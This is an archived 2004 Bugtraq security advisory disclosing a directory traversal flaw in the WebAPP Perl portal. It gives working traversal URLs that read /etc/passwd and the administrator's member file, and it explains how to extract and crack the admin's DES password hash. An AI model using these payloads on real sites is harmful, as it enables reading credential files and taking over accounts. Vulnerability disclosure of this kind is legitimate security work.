[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

WebAPP directory traversal and ability to retrieve the DES encrypted password hash

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: WebAPP directory traversal and ability to retrieve the DES encrypted password hash
From: "Jérôme" ATHIAS <jerome.athias@xxxxxxxxxxxx>
Date: 24 Aug 2004 15:42:51 -0000



WebAPP is advertised as the internet's most feature rich,
easy to run PERL based portal system.
Its home site is at http://www.web-app.org/
Some features are :

   -Easy to Install on standard Unix servers!
      (Windows user-supported only!)
   -User Profiles
   -Message forums
   -Private messaging between members
   -Blog-style News Articles
   -Links and Downloads
   -Customizable themes
   -Multiple language support
   -Flat-file System-NO SQL DATABASE!
   -Membership controls
   -Open source

Several user mods are also available which ranges from chat
to e-commerce applications.

Several vulnerabilities in these mods have already been
discovered. 



The WebAPP system itself has a serious reverse directory
traversal vulnerability.

Example..

1) Go to http://vulnerable-target.xxx/cgi-bin/index.cgi
/this is their main support site/

2) Click on Articles on the main menu at the left side of
the screen

3) Click on any of the icons representing the misc topics
available   /i chose the "bugs" section/

4) You'll wind up with the url 
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=bugs";
on the address bar on your browser. Change it to
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00";

5)View the html source for the page



A more interesting file to look at would be;
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00";

View the html source code and scroll down until you come to
the line with;
href="index.cgi?action=viewnews&amp;id=adUCOOzV2ljgg"></a></td>

"adUCOOzV2ljgg" is the hashed password of the Administrator.
It's standard DES encrypted so you can
run a password cracking program to crack it

Every user would have a corresponding .dat file within the
db/members directory


PhTeam Release

Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,
ch1m3ra, and sa mga posers na kupal sa #oneball

Prev by Date: What A Drag! -revisited-
Next by Date: Yahoo! E-mail Service Vulnerability
Previous by thread: What A Drag! -revisited-
Next by thread: Yahoo! E-mail Service Vulnerability
Index(es):
- Date
- Thread